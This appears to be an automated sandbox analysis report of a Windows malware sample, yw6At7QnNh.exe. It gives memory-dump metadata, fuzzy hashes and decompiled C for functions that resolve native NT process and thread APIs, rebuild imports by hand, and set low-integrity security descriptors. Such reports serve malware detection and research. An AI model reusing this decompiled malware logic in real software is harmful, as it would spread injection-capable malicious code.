Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$??0exception@@ExceptionThrowstrlen
String ID: invalid string position
API String ID: 4056035191-1799206989
Opcode ID: 45caeee324ddf7c98e276f4bf3aef80acb604a2fd3a0f52ff4bbd872f52993a0
Instruction ID: e0d7c25cb8fe0c211b54dec80dfa4da4dbce1340978684376c1bd020f4b95780
Opcode Fuzzy Hash: 45caeee324ddf7c98e276f4bf3aef80acb604a2fd3a0f52ff4bbd872f52993a0
Instruction Fuzzy Hash: ABF0DA72C11128BADB04FBA5DD49ADEBB7CAF19314F40406AF911760D2DBB856088BB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040216C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040216C(char** __ecx) {
				intOrPtr _t14;
				void* _t27;

				L00402586();
				_push(__ecx);
				_t14 =  *((intOrPtr*)(_t27 + 8));
				_push(_t14);
				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
				L004026F0();
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				_t22 =  &(__ecx[3]);
				__ecx[3] =  *((intOrPtr*)(_t14 + 0xc));
				E00401DD5( &(__ecx[3]), 0);
				E0040233F(_t22, _t14 + 0xc, 0,  *0x403140);
				 *__ecx = "P!@";
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return __ecx;
			}

0x00402171
0x00402176
0x00402178
0x0040217f
0x00402180
0x00402183
0x0040218b
0x00402192
0x00402199
0x0040219b
0x004021ab
0x004021b3
0x004021be
0x004021c6

APIs

_EH_prolog.MSVCRT ref: 00402171
??0exception@@QAE@ABV0@@Z.MSVCRT(?), ref: 00402183

Strings

P!@, xrefs: 004021B3

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ??0exception@@H_prologV0@@
String ID: P!@
API String ID: 1023251003-1774101457
Opcode ID: 067bbbf1bda4fcc1dc514d3da1c5fb9b9cdb0455a7343cec7235a701fc84b4c5
Instruction ID: dc1d397bb556e0cc06bf90b73dd2d5b7152a75cd55362aaf52ba11446872b5bc
Opcode Fuzzy Hash: 067bbbf1bda4fcc1dc514d3da1c5fb9b9cdb0455a7343cec7235a701fc84b4c5
Instruction Fuzzy Hash: B6F054766002406BC7115F5A9D45B5EFB69EB48755F04442FF545BB2C2C7F8590087A8

Uniqueness

Uniqueness Score: -1.00%

Function 004021C9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004021C9(char** __ecx, void* __eflags) {
				void* _t9;
				void* _t17;

				L00402586();
				_push(__ecx);
				 *((intOrPtr*)(_t17 - 0x10)) = __ecx;
				 *__ecx = "P!@";
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				_t9 = E00401DD5( &(__ecx[3]), 1);
				 *(_t17 - 4) =  *(_t17 - 4) | 0xffffffff;
				L0040271E();
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t9;
			}

0x004021ce
0x004021d3
0x004021d7
0x004021da
0x004021e0
0x004021e9
0x004021ee
0x004021f4
0x004021fd
0x00402205

APIs

_EH_prolog.MSVCRT ref: 004021CE
??1exception@@UAE@XZ.MSVCRT(00000001,?,?,0040222B,?,?,00403408), ref: 004021F4

Strings

P!@, xrefs: 004021DA

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ??1exception@@H_prolog
String ID: P!@
API String ID: 1656532167-1774101457
Opcode ID: bd039a5c8f16ff708a838ebe32cefc55b635277a074061dcfc276d8bcba263e3
Instruction ID: 23919f60721e3cb12c069b6fcf3d218434a72c03e79e54153f9ce7871d62e3e5
Opcode Fuzzy Hash: bd039a5c8f16ff708a838ebe32cefc55b635277a074061dcfc276d8bcba263e3
Instruction Fuzzy Hash: F5E04671910611ABC728AF58D91679DB7B8EF08724F10866FA062B32C0CBF85A008B88

Uniqueness

Uniqueness Score: -1.00%

Function 00402113, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00402113(char** __ecx) {
				void* _t9;
				void* _t17;

				L00402586();
				_push(__ecx);
				 *((intOrPtr*)(_t17 - 0x10)) = __ecx;
				 *__ecx = "P!@";
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				_t9 = E00401DD5( &(__ecx[3]), 1);
				 *(_t17 - 4) =  *(_t17 - 4) | 0xffffffff;
				L0040271E();
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t9;
			}

0x00402118
0x0040211d
0x00402121
0x00402124
0x0040212a
0x00402133
0x00402138
0x0040213e
0x00402147
0x0040214f

APIs

_EH_prolog.MSVCRT ref: 00402118
??1exception@@UAE@XZ.MSVCRT(00000001,?,?,?,00403478), ref: 0040213E

Strings

P!@, xrefs: 00402124

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ??1exception@@H_prolog
String ID: P!@
API String ID: 1656532167-1774101457
Opcode ID: 49efff08415b09e85c37c017dd115aa86e2827151ed8a416f4949fd4d95beca8
Instruction ID: b617ac85027aa97d32976b97671e7977720099ea72aa1b7bfabbb41d9032c361
Opcode Fuzzy Hash: 49efff08415b09e85c37c017dd115aa86e2827151ed8a416f4949fd4d95beca8
Instruction Fuzzy Hash: 02E04F71910611ABC724AF58D91579DB7B4EF08724F10866FA062B31C0C7F85A008788

Uniqueness

Uniqueness Score: -1.00%

Function 004022B1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004022B1(char** __ecx) {
				void* _t9;
				void* _t17;

				L00402586();
				_push(__ecx);
				 *((intOrPtr*)(_t17 - 0x10)) = __ecx;
				 *__ecx = "P!@";
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				_t9 = E00401DD5( &(__ecx[3]), 1);
				 *(_t17 - 4) =  *(_t17 - 4) | 0xffffffff;
				L0040271E();
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t9;
			}

0x004022b6
0x004022bb
0x004022bf
0x004022c2
0x004022c8
0x004022d1
0x004022d6
0x004022dc
0x004022e5
0x004022ed

APIs

_EH_prolog.MSVCRT ref: 004022B6
??1exception@@UAE@XZ.MSVCRT(00000001,?,?,invalid string position), ref: 004022DC

Strings

P!@, xrefs: 004022C2

Memory Dump Source

Source File: 00000002.00000002.205116569.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ??1exception@@H_prolog
String ID: P!@
API String ID: 1656532167-1774101457
Opcode ID: dacfea25433732980db300b18ec870d966422ee7c7e7e9598b246d4d4ab46073
Instruction ID: 31e2c1cb12423125ed0a21eae19ed48514e4c5156cda51c9944febb9a22617b8
Opcode Fuzzy Hash: dacfea25433732980db300b18ec870d966422ee7c7e7e9598b246d4d4ab46073
Instruction Fuzzy Hash: F6E04F71910610ABC724AF58D91579DB7B8EF48724F10876FA062B31C0C7F85A008788

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: yw6At7QnNh.exe PID: 1536 Parent PID: 5952 yw6At7QnNh.exeCOMMON

Executed Functions

Function 00412D30, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 229
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00412D30(signed int** __ecx, void* __edx, signed char _a4) {
				char _v537;
				char _v788;
				char _v796;
				char _v808;
				intOrPtr _v816;
				intOrPtr _v820;
				signed int _v824;
				intOrPtr _v828;
				signed int** _v832;
				struct HINSTANCE__* _v836;
				void* __edi;
				void* __esi;
				signed int _t40;
				struct HINSTANCE__* _t43;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t53;
				void* _t54;
				signed int _t57;
				void** _t58;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				void* _t73;
				intOrPtr _t77;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				struct HINSTANCE__* _t81;
				int _t83;
				signed int _t86;
				void* _t89;
				signed int* _t91;
				signed int _t95;
				WCHAR* _t97;
				void* _t98;
				signed int* _t100;

				_t89 = __edx;
				_t87 = __ecx;
				_t95 = _a4 & 0x00000001;
				_v824 = _t95;
				if(_t95 != 0) {
					_t83 = 0;
					__eflags = 0;
				} else {
					_t83 = 0;
					 *0x4238a0 = 0;
				}
				_t91 = E004129EB();
				 *0x4238b8 = _t91;
				if(_t91 == _t83) {
					L27:
					_t40 = 0;
				} else {
					if(_t95 != _t83) {
						_v824 = E00412925(_t87, _t89, _t91, "GetProcAddress");
						_v824 = E00412925(_t87, _t89, _t91, "LoadLibraryA");
						_t43 =  *0x4238b4;
						_v836 = _t43;
						_t87 =  *((intOrPtr*)(_t43 + 0x3c)) + _t43 + 0x80;
						__eflags = _v824 - _t83;
						if(_v824 == _t83) {
							goto L21;
						} else {
							__eflags = _v820 - _t83;
							if(_v820 == _t83) {
								goto L21;
							} else {
								_t91 =  *_t87;
								__eflags = _t91 - _t83;
								if(_t91 <= _t83) {
									goto L21;
								} else {
									__eflags = _t87[1] - 0x14;
									if(_t87[1] <= 0x14) {
										goto L21;
									} else {
										_t91 = _t91 + _t43;
										__eflags =  *_t91 - _t83;
										if( *_t91 == _t83) {
											goto L21;
										} else {
											while(1) {
												_t77 = _v816(_t91[3] + _v828);
												_v816 = _t77;
												__eflags = _t77 - _t83;
												if(_t77 == _t83) {
													goto L27;
												}
												_t100 = _v832 +  *_t91;
												_t86 = _v832 + _t91[4];
												while(1) {
													_t78 =  *_t100;
													__eflags = _t78;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t87 = _v832;
														_t79 =  &(_v832[0]) + _t78;
													} else {
														_t79 = _t78 & 0x0000ffff;
													}
													_t80 = _v824(_v816, _t79);
													__eflags = _t80;
													if(_t80 == 0) {
														goto L27;
													} else {
														 *_t86 = _t80;
														_t100 =  &(_t100[1]);
														_t86 = _t86 + 4;
														__eflags = _t86;
														continue;
													}
													goto L47;
												}
												_t91 =  &(_t91[5]);
												_t83 = 0;
												__eflags =  *_t91;
												if( *_t91 != 0) {
													continue;
												} else {
													goto L21;
												}
												goto L47;
											}
											goto L27;
										}
									}
								}
							}
						}
					} else {
						_t81 = GetModuleHandleW(_t83);
						 *0x4238b4 = _t81;
						if(_t81 == _t83) {
							goto L27;
						} else {
							L21:
							_t97 =  &_v808;
							E004128DB(0xe5, _t97);
							_t47 = GetModuleHandleW(_t97);
							 *0x4238bc = _t47;
							if(_t47 == _t83) {
								goto L27;
							} else {
								_t98 = GetProcAddress;
								 *0x4238c0 = GetProcAddress(_t47, "NtCreateThread");
								 *0x4238c4 = GetProcAddress( *0x4238bc, "NtCreateUserProcess");
								 *0x4238c8 = GetProcAddress( *0x4238bc, "NtQueryInformationProcess");
								 *0x4238cc = GetProcAddress( *0x4238bc, "RtlUserThreadStart");
								 *0x4238d0 = GetProcAddress( *0x4238bc, "LdrLoadDll");
								_t53 = GetProcAddress( *0x4238bc, "LdrGetDllHandle");
								 *0x4238d4 = _t53;
								if( *0x4238c0 != _t83 ||  *0x4238c4 != _t83) {
									if( *0x4238c8 == _t83 ||  *0x4238d0 == _t83 || _t53 == _t83) {
										goto L27;
									} else {
										_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
										 *0x423774 = _t54;
										__eflags = _t54 - _t83;
										if(_t54 != _t83) {
											 *0x422463 = 1;
										} else {
											 *0x423774 = GetProcessHeap();
											 *0x422463 = 0;
										}
										 *0x422da8 = _t83;
										 *0x422462 = 0;
										InitializeCriticalSection(0x423dd4);
										 *0x423dec = _t83; // executed
										__imp__#115(0x202,  &_v788); // executed
										_t57 = E00412A25(_a4, _t87, _t91, _t98);
										__eflags = _t57;
										if(_t57 == 0) {
											goto L27;
										} else {
											__eflags = _v832 - _t83;
											if(_v832 != _t83) {
												L34:
												_t58 = E0040D7D9(_t87, 0xffffffff, 0x4238b0);
												 *0x4238a4 = _t58;
												__eflags = _t58 - _t83;
												if(_t58 == _t83) {
													goto L27;
												} else {
													 *0x4238a8 = GetLengthSid( *_t58);
													 *0x4238ac = E0040D571( *( *0x4238a4), _t59);
													_t62 = E00412AA4(_t61, _a4);
													__eflags = _t62;
													if(_t62 == 0) {
														goto L27;
													} else {
														 *0x423b10 = GetCurrentProcessId();
														 *0x423b14 = _t83;
														__eflags = _v832 - _t83;
														if(_v832 != _t83) {
															_t64 = 1;
														} else {
															_t64 = E00412B06();
														}
														__eflags = _t64;
														if(_t64 == 0) {
															goto L27;
														} else {
															__eflags = _v832 - _t83;
															if(_v832 == _t83) {
																E0041341A( &_v796);
																_t87 = 0x423d0e;
																E0041081B(0x423d0e, 0x423b18,  *0x4238ac,  &_v537, _t83);
															}
															_t65 = E00412B58(_a4);
															__eflags = _t65;
															if(_t65 == 0) {
																goto L27;
															} else {
																__eflags = _a4 & 0x00000002;
																 *0x423784 = _t83;
																 *0x422468 = 0;
																 *0x422400 = 0;
																 *0x422918 = 0;
																 *0x4228b0 = 0;
																 *0x423df0 = 0;
																 *0x423d70 = 0;
																if(__eflags == 0) {
																	_t67 = 1;
																} else {
																	_t67 = E00412C0F(_t87, _t89, __eflags);
																}
																__eflags = _t67;
																_t38 = _t67 != 0;
																__eflags = _t38;
																_t40 = _t67 & 0xffffff00 | _t38;
															}
														}
													}
												}
											} else {
												_t73 = CreateEventW(0x4238d8, 1, _t83, _t83);
												 *0x423d68 =  *0x423d68 | 0xffffffff;
												 *0x423d64 = _t73;
												__eflags = _t73 - _t83;
												if(_t73 == _t83) {
													goto L27;
												} else {
													goto L34;
												}
											}
										}
									}
								} else {
									goto L27;
								}
							}
						}
					}
				}
				L47:
				return _t40;
			}

0x00412d30
0x00412d30
0x00412d41
0x00412d45
0x00412d49
0x00412d55
0x00412d55
0x00412d4b
0x00412d4b
0x00412d4d
0x00412d4d
0x00412d5c
0x00412d5e
0x00412d66
0x00412eeb
0x00412eeb
0x00412d6c
0x00412d6e
0x00412d98
0x00412da1
0x00412da5
0x00412dad
0x00412db1
0x00412db8
0x00412dbc
0x00000000
0x00412dbe
0x00412dbe
0x00412dc2
0x00000000
0x00412dc4
0x00412dc4
0x00412dc6
0x00412dc8
0x00000000
0x00412dca
0x00412dca
0x00412dce
0x00000000
0x00412dd0
0x00412dd0
0x00412dd2
0x00412dd4
0x00000000
0x00412dd6
0x00412dd6
0x00412dde
0x00412de2
0x00412de6
0x00412de8
0x00000000
0x00000000
0x00412df3
0x00412df7
0x00412e27
0x00412e27
0x00412e29
0x00412e2b
0x00000000
0x00000000
0x00412dfd
0x00412e06
0x00412e0a
0x00412dff
0x00412dff
0x00412dff
0x00412e13
0x00412e17
0x00412e19
0x00000000
0x00412e1f
0x00412e1f
0x00412e21
0x00412e24
0x00412e24
0x00000000
0x00412e24
0x00000000
0x00412e19
0x00412e2d
0x00412e30
0x00412e32
0x00412e34
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00412e34
0x00000000
0x00412dd6
0x00412dd4
0x00412dce
0x00412dc8
0x00412dc2
0x00412d70
0x00412d71
0x00412d77
0x00412d7e
0x00000000
0x00412d84
0x00412e36
0x00412e36
0x00412e3f
0x00412e47
0x00412e4d
0x00412e54
0x00000000
0x00412e5a
0x00412e5a
0x00412e73
0x00412e85
0x00412e97
0x00412ea9
0x00412ebb
0x00412ec0
0x00412ec2
0x00412ecd
0x00412edd
0x00000000
0x00412ef2
0x00412ef9
0x00412eff
0x00412f04
0x00412f06
0x00412f1c
0x00412f08
0x00412f0e
0x00412f13
0x00412f13
0x00412f28
0x00412f2e
0x00412f35
0x00412f45
0x00412f4b
0x00412f54
0x00412f59
0x00412f5b
0x00000000
0x00412f5d
0x00412f5d
0x00412f61
0x00412f86
0x00412f8d
0x00412f92
0x00412f97
0x00412f99
0x00000000
0x00412f9f
0x00412fa7
0x00412fbc
0x00412fc1
0x00412fc6
0x00412fc8
0x00000000
0x00412fce
0x00412fd4
0x00412fd9
0x00412fdf
0x00412fe3
0x00412fec
0x00412fe5
0x00412fe5
0x00412fe5
0x00412fee
0x00412ff0
0x00000000
0x00412ff6
0x00412ff6
0x00412ffa
0x00413000
0x00413014
0x00413023
0x00413023
0x0041302b
0x00413030
0x00413032
0x00000000
0x00413038
0x0041303a
0x0041303e
0x00413044
0x0041304a
0x00413050
0x00413056
0x0041305c
0x00413062
0x00413068
0x00413071
0x0041306a
0x0041306a
0x0041306a
0x00413073
0x00413075
0x00413075
0x00413075
0x00413075
0x00413032
0x00412ff0
0x00412fc8
0x00412f63
0x00412f6c
0x00412f72
0x00412f79
0x00412f7e
0x00412f80
0x00000000
0x00000000
0x00000000
0x00000000
0x00412f80
0x00412f61
0x00412f5b
0x00000000
0x00000000
0x00000000
0x00412ecd
0x00412e54
0x00412d7e
0x00412d6e
0x00413078
0x0041307e

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412D71
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412E47
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412E66
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 00412E78
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 00412E8A
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 00412E9C
GetProcAddress.KERNEL32(LdrLoadDll), ref: 00412EAE
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 00412EC0
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 00412EF9
GetProcessHeap.KERNEL32(?,?,00000000), ref: 00412F08
InitializeCriticalSection.KERNEL32(00423DD4,?,?,00000000), ref: 00412F35
WSAStartup.WS2_32(00000202,?), ref: 00412F4B
CreateEventW.KERNEL32(004238D8,00000001,00000000,00000000,?,?,00000000), ref: 00412F6C
GetLengthSid.ADVAPI32(00000000,000000FF,004238B0,?,?,00000000), ref: 00412FA1
GetCurrentProcessId.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 00412FCE

Strings

LdrGetDllHandle, xrefs: 00412EB0
LdrLoadDll, xrefs: 00412E9E
GetProcAddress, xrefs: 00412D89
NtCreateUserProcess, xrefs: 00412E68
NtQueryInformationProcess, xrefs: 00412E7A
NtCreateThread, xrefs: 00412E60
LoadLibraryA, xrefs: 00412D93
RtlUserThreadStart, xrefs: 00412E8C

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-305303173
Opcode ID: a2a261186f04931f6ccb4ef6965da0795b3a0dab78e248b1726a36016c670151
Instruction ID: 0285fe6d69633572b52a5e6faad45937bebd7ed400e44a306ec3287023ebc47b
Opcode Fuzzy Hash: a2a261186f04931f6ccb4ef6965da0795b3a0dab78e248b1726a36016c670151
Instruction Fuzzy Hash: 37916AB17003419FCB20AF64AE846967BF4FB44306B50043FF941E7261D7B89A96CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7B1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040F7B1(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x0040f7b1
0x0040f7b1
0x0040f7c3
0x00000000
0x0040f7d6
0x0040f7d7
0x0040f7e2
0x0040f7ea
0x0040f825
0x0040f825
0x0040f829
0x0040f82b
0x0040f82d
0x0040f833
0x0040f836
0x0040f836
0x00000000
0x0040f839
0x0040f7fb
0x0040f806
0x0040f81f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f806

APIs

InitializeSecurityDescriptor.ADVAPI32(004238E4,00000001,00000000,00412F59,?,?,00000000), ref: 0040F7BB
SetSecurityDescriptorDacl.ADVAPI32(004238E4,00000001,00000000,00000000,?,?,00000000), ref: 0040F7CC
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0040F7E2
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 0040F7FE
SetSecurityDescriptorSacl.ADVAPI32(004238E4,?,?,?,?,?,00000000), ref: 0040F812
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 0040F81F

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 0040F7DD

Memory Dump Source

Source File: 00000003.00000002.204116017.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.204169559.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: f6854562f6b39a1e0a24887e409eb5f2ad18f262c7977427dc2031e594910f7a
Instruction ID: f7f013c1c474213b982dd55d9c095e7f549268e7b311508b506c35fb7f07a90b
Opcode Fuzzy Hash: f6854562f6b39a1e0a24887e409eb5f2ad18f262c7977427dc2031e594910f7a
Instruction Fuzzy Hash: BD114F72A00209FBEB21AFA19E85AEFBBBCAB04740F10807AF551F15A0D7759A449A14

Uniqueness

Uniqueness Score: -1.00%

Function 00410765, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00410765() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E0040C275(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x00410766
0x00410775
0x00410781
0x00410784
0x0041078c
0x00410803
0x00410809
0x0041078e
0x0041079b
0x0041079d
0x004107cc
0x004107d9
0x004107dd
0x00000000
0x00000000
0x004107ac
0x004107c1
0x00000000
0x004107c3
0x004107ca
0x00000000
0x004107ca
0x00000000
0x004107c1
0x004107e4
0x00000000
0x004107e6
0x004107eb
0x004107ef
0x004107f3
0x004107fb
0x00000000
0x004107fd
0x004107fd
0x004107fd
0x004107fb
0x004107e4
0x0041080e
0x00410818

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,0001FEBC,00000000), ref: 00410784
PathAddBackslashW.SHLWAPI(?), ref: 0041079B
PathRemoveBackslashW.SHLWAPI(?), ref: 004107AC
PathRemoveFileSpecW.SHLWAPI(?), ref: 004107B9
PathAddBackslashW.SHLWAPI(?), ref: 004107CA
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 004107D9
CLSIDFromString.OLE32(?,?), ref: 004107F3

Memory Dump Source

Source File: 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.203794504.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: dd18464de683040582eedb859b7376750294c14d175945f9d7dec54d2c2fa365
Instruction ID: 8ddc4772f7f2cad33d74db1f090c0e50ea7e5adbc3361b3ec96a286fa6aaa82c
Opcode Fuzzy Hash: dd18464de683040582eedb859b7376750294c14d175945f9d7dec54d2c2fa365
Instruction Fuzzy Hash: D1114F7190820DAADF20ABB0DD88EDF77BCAB04344F14047AE514E6160E779DA889B64

Uniqueness

Uniqueness Score: -1.00%

Function 00413CB7, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(signed int __ecx, void* __edx, void* __eflags, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				signed int _t36;
				void* _t51;

				_t51 = __fp0;
				_t34 = __ecx;
				_t33 = 0; // executed
				_t22 = E00412D30(__ecx, __edx, 0); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E00413970(_t34, __eflags, _t51, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x4238a0 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t36 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t48 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E00416B62(_t36);
						_t29 = E0040ABE3();
						__eflags =  *0x4238a0 & 0x00000004;
						_t33 = _t29;
						if(( *0x4238a0 & 0x00000004) != 0) {
							_t29 = E004169DB(0x423e80, 0);
						}
						goto L21;
					}
					_t29 = E00413782(_t48);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t36 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t36 = _t36 + 1;
				} while (_t36 < _v12);
				goto L14;
			}

0x00413cb7
0x00413cb7
0x00413cc0
0x00413cc2
0x00413cc9
0x00413da3
0x00413da5
0x00413da7
0x00413da7
0x00413dab
0x00413dab
0x00413cd4
0x00413cd7
0x00413cdb
0x00413cde
0x00413cef
0x00413cf7
0x00413d7e
0x00413d84
0x00413d89
0x00413d89
0x00413d8b
0x00413d8d
0x00000000
0x00413d98
0x00413d9a
0x00413da2
0x00413da2
0x00413d8d
0x00413cfd
0x00413d02
0x00413d43
0x00413d44
0x00413d4a
0x00413d4c
0x00413d55
0x00413d59
0x00000000
0x00000000
0x00413d5b
0x00413d60
0x00413d65
0x00413d6c
0x00413d6e
0x00413d77
0x00413d77
0x00000000
0x00413d6e
0x00413d4e
0x00000000
0x00000000
0x00000000
0x00000000
0x00413d04
0x00413d04
0x00413d04
0x00413d09
0x00413d11
0x00413d18
0x00413d39
0x00413d1a
0x00413d1d
0x00413d35
0x00413d1f
0x00413d22
0x00413d2f
0x00413d24
0x00413d27
0x00413d29
0x00413d29
0x00413d27
0x00413d22
0x00413d1d
0x00413d18
0x00413d3d
0x00413d3e
0x00000000

APIs

Part of subcall function 00412D30: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 00412D71
Part of subcall function 00412D30: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 00412E47
Part of subcall function 00412D30: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 00412E66
